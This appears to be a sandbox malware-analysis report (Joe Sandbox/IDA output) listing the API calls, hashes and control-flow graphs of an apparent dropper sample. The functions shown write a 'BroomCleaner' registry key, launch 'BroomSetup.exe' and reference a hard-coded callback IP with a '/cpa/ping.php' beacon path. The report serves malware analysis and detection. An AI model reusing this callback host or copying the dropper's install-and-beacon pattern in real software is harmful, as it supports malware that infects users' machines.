• Opcode ID: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
• Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
• Opcode Fuzzy Hash: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
• Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05BB024D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 2eb7f9c60bbe20443b1df861242a33580495443a7f783490d3c90b93042fdf50
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: F6526974A01229DFDB64CF58C984BADBBB1BF09304F1480D9E94DAB351DBB0AA95CF14
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• __EH_prolog.LIBCMT ref: 00426134
• RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
• RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
• RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: CloseCreateH_prologValue
• String ID: Installed$SOFTWARE\BroomCleaner
• API String ID: 1996196666-529226407
• Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1648 426260-42626f 1649 426271-426277 1648->1649 1649->1649 1650 426279-4262ac ShellExecuteExA 1649->1650 1651 4262c5-4262d1 call 402bef 1650->1651 1652 4262ae-4262bf WaitForSingleObject CloseHandle 1650->1652 1652->1651
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004262BF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                  • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                  • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                  • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1655 4163fd-416411 call 41e97a 1658 416413-416415 1655->1658 1659 416417-41641f 1655->1659 1660 416465-416485 call 41e8e9 1658->1660 1661 416421-416428 1659->1661 1662 41642a-41642d 1659->1662 1670 416493 1660->1670 1671 416487-416491 call 41234b 1660->1671 1661->1662 1663 416435-416449 call 41e97a * 2 1661->1663 1664 41644b-41645b call 41e97a FindCloseChangeNotification 1662->1664 1665 41642f-416433 1662->1665 1663->1658 1663->1664 1664->1658 1677 41645d-416463 GetLastError 1664->1677 1665->1663 1665->1664 1675 416495-416498 1670->1675 1671->1675 1677->1660
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 490808831-0
                                                                                                                                                                                                                                  • Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                  • Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1680 419767-41977f call 41e97a 1683 419781-419786 call 412381 1680->1683 1684 419792-4197a8 SetFilePointerEx 1680->1684 1690 41978c-419790 1683->1690 1685 4197b9-4197c3 1684->1685 1686 4197aa-4197b7 GetLastError call 41234b 1684->1686 1689 4197c5-4197da 1685->1689 1685->1690 1686->1690 1692 4197df-4197e4 1689->1692 1690->1692
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2336955059-0
                                                                                                                                                                                                                                  • Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                  • Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1694 426217-42623c CreateFileA 1695 426259-42625f 1694->1695 1696 42623e-426253 WriteFile FindCloseChangeNotification 1694->1696 1696->1695
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3805958096-0
                                                                                                                                                                                                                                  • Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                  • Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1705 401bb2-401c21 call 4275a4 call 40307c call 402fe5 call 402f6b 1714 401c51-401c61 1705->1714 1715 401c23-401c47 1705->1715 1715->1714 1716 401c49-401c4c call 40187f 1715->1716 1716->1714
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                    • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                    • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                    • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                    • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                                  • String ID: v*@
                                                                                                                                                                                                                                  • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                                  • Opcode ID: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
                                                                                                                                                                                                                                  • Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                    • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                    • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 420165198-0
                                                                                                                                                                                                                                  • Opcode ID: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1742 411ccd6-411ccef 1743 411ccf1-411ccf3 1742->1743 1744 411ccf5 1743->1744 1745 411ccfa-411cd06 CreateToolhelp32Snapshot 1743->1745 1744->1745 1746 411cd16-411cd23 Module32First 1745->1746 1747 411cd08-411cd0e 1745->1747 1748 411cd25-411cd26 call 411c995 1746->1748 1749 411cd2c-411cd34 1746->1749 1747->1746 1754 411cd10-411cd14 1747->1754 1752 411cd2b 1748->1752 1752->1749 1754->1743 1754->1746
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0411CCFE
                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0411CD1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0411C000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_411c000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction ID: af5d49c0c14a0e2069e601176b10ed4d70ece5b4a171f6216c786f76301c61d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBF062311407156BEB203BF998CDBAA76E9EF89665F100578E643A20D0EB70F84686A1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1755 5bb0e0f-5bb0e24 SetErrorMode * 2 1756 5bb0e2b-5bb0e2c 1755->1756 1757 5bb0e26 1755->1757 1757->1756
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,05BB0223,?,?), ref: 05BB0E19
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,05BB0223,?,?), ref: 05BB0E1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction ID: 36f11a4fb15f1363c24fb51da6a1cc7a0585d5c8bbbf76bc5244d06063cd0623
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57D0123154512C77D7003A94DC0DBDE7B1CDF09B62F008051FB0DD9080C7F1954046E5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                  • Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
• Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
• Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
• Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 004024A6
  • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
  • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: Exception@8H_prologThrowstd::system_error::system_error
• String ID:
• API String ID: 938716162-0
• Opcode ID: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
• Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
• Opcode Fuzzy Hash: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
• Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 00402581
  • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
• Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
• Opcode Fuzzy Hash: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
• Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 00402408
  • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
• Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
• Opcode Fuzzy Hash: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
• Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
• Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
• Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
• Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
• Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
• Opcode Fuzzy Hash: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
• Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 00402F70
  • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
  • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
  • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
  • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
  • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
